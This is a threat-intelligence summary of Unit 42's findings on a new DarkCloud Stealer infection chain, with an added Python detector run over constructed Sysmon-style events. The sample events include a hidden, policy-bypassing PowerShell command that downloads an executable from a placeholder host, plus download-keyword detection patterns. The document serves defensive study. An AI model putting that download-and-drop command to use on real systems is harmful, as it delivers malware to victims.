
New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer

· Published 08/08/2025 08:00 · Modified 10/08/2025 19:40


Essential information

Tags
2025-08-07, 2025-08-08, anti-analysis, confuserex, darkcloud stealer, infection chain, infostealer, obfuscation, process-hollowing, runpe, visual basic 6
Related entities
10 observables, 5 techniques (mitre), 1 malware

Description

Unit 42 researchers have observed changes in the distribution and techniques of DarkCloud Stealer. The new infection chain, first seen in April 2025, involves a ConfuserEx-protected executable and a final payload written in Visual Basic 6. The attack begins with a phishing email containing an archive file, which leads to the download and execution of a PowerShell script. That script drops an executable protected by ConfuserEx, which in turn injects the payload into a legitimate process (process hollowing, also known as RunPE). The malware employs various anti-analysis techniques, including encryption and obfuscation of its strings. These changes show the evolving evasion strategies of the operators and underscore the need for behavior-based detection that keys on the chain's actions (script download, dropped executable, injection into a legitimate process) rather than on signatures tied to a single packer or loader.
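The chain above is a good fit for behavior-based detection because each stage leaves a distinct process or file event regardless of how the stage is obfuscated. The script below is an added example, not Unit 42's code or any vendor's rule: it walks a list of constructed Sysmon-style events (ProcessCreate, FileCreate and ProcessAccess, modelled on Event IDs 1, 11 and 10) and reports the three stages described in the summary. The process IDs, the dropped file path and the hollowed target (a placeholder path under C:\Windows) are all constructed for illustration; the download keywords and the access-rights mask are heuristics chosen here, not indicators from the report.

```python
"""Behavior-based detection of the DarkCloud-style chain: download via PowerShell,
drop-and-run of an executable, then hollowing of a legitimate process.
Added example over constructed Sysmon-style events; not Unit 42's code."""
from dataclasses import dataclass

# Rights a parent needs to rewrite a child's image (process hollowing / RunPE).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
HOLLOW_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Heuristic choices for this example (assumptions, not indicators from the report).
LEGIT_DIRS = ("c:\\windows\\", "c:\\program files\\")
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "net.webclient")


@dataclass
class Finding:
    stage: str   # "download", "dropped-exe" or "hollowing"
    pid: int
    detail: str


def detect_chain(events):
    """Walk events in time order and return one Finding per observed stage.

    Stage 1: powershell.exe whose command line downloads something.
    Stage 2: an .exe written by that PowerShell and then launched by it.
    Stage 3: that executable starts a binary from a trusted directory and then
             opens it with thread-create plus memory-write rights.
    """
    findings = []
    ps_pids = set()        # suspicious PowerShell instances
    dropped = {}           # lower-cased path -> pid of the PowerShell that wrote it
    dropper_pids = set()   # dropped executables once launched
    hollow_children = {}   # child pid -> (dropper pid, child image)

    for ev in events:
        eid = ev["EventID"]
        if eid == 1:  # ProcessCreate
            image = ev["Image"].lower()
            cmd = ev.get("CommandLine", "").lower()
            parent = ev["ParentProcessId"]
            if image.endswith("powershell.exe") and any(h in cmd for h in DOWNLOAD_HINTS):
                ps_pids.add(ev["ProcessId"])
                findings.append(Finding("download", ev["ProcessId"], cmd))
            elif parent in ps_pids and image in dropped:
                dropper_pids.add(ev["ProcessId"])
                findings.append(Finding("dropped-exe", ev["ProcessId"], image))
            elif parent in dropper_pids and image.startswith(LEGIT_DIRS):
                hollow_children[ev["ProcessId"]] = (parent, image)
        elif eid == 11:  # FileCreate
            target = ev["TargetFilename"].lower()
            if ev["ProcessId"] in ps_pids and target.endswith(".exe"):
                dropped[target] = ev["ProcessId"]
        elif eid == 10:  # ProcessAccess
            tgt = ev["TargetProcessId"]
            if tgt in hollow_children and hollow_children[tgt][0] == ev["SourceProcessId"]:
                granted = int(ev["GrantedAccess"], 16)
                if granted & HOLLOW_MASK == HOLLOW_MASK:
                    findings.append(Finding(
                        "hollowing", tgt,
                        f"{hollow_children[tgt][1]} opened with 0x{granted:x}"))
    return findings


# Constructed sample telemetry (pids, paths and the hollowed target are placeholders).
PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    # Benign PowerShell: no download, should not be flagged.
    {"EventID": 1, "ProcessId": 3900, "ParentProcessId": 3000, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -c Get-Date"},
    # Stage 1: PowerShell fetched from the archive lure downloads the next stage.
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 3000, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/x','C:\\Users\\Public\\svc.exe')\""},
    {"EventID": 11, "ProcessId": 4100, "TargetFilename": "C:\\Users\\Public\\svc.exe"},
    # Stage 2: the dropped (ConfuserEx-protected) executable is launched.
    {"EventID": 1, "ProcessId": 4220, "ParentProcessId": 4100,
     "Image": "C:\\Users\\Public\\svc.exe", "CommandLine": "svc.exe"},
    # Stage 3: it starts a legitimate binary, then opens it with write rights.
    {"EventID": 1, "ProcessId": 4300, "ParentProcessId": 4220,
     "Image": "C:\\Windows\\System32\\placeholder-host.exe", "CommandLine": "placeholder-host.exe"},
    {"EventID": 10, "SourceProcessId": 4220, "TargetProcessId": 4300, "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for f in detect_chain(SAMPLE_EVENTS):
        print(f"[{f.stage}] pid={f.pid} {f.detail}")
```

The benign PowerShell instance is deliberately left in the sample to show that the rule keys on the download-and-drop behavior, not on PowerShell itself. In a real pipeline the ProcessAccess check would also consider the target being created suspended and an image-path mismatch between the mapped module and the on-disk file, neither of which plain Sysmon events expose directly.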

External references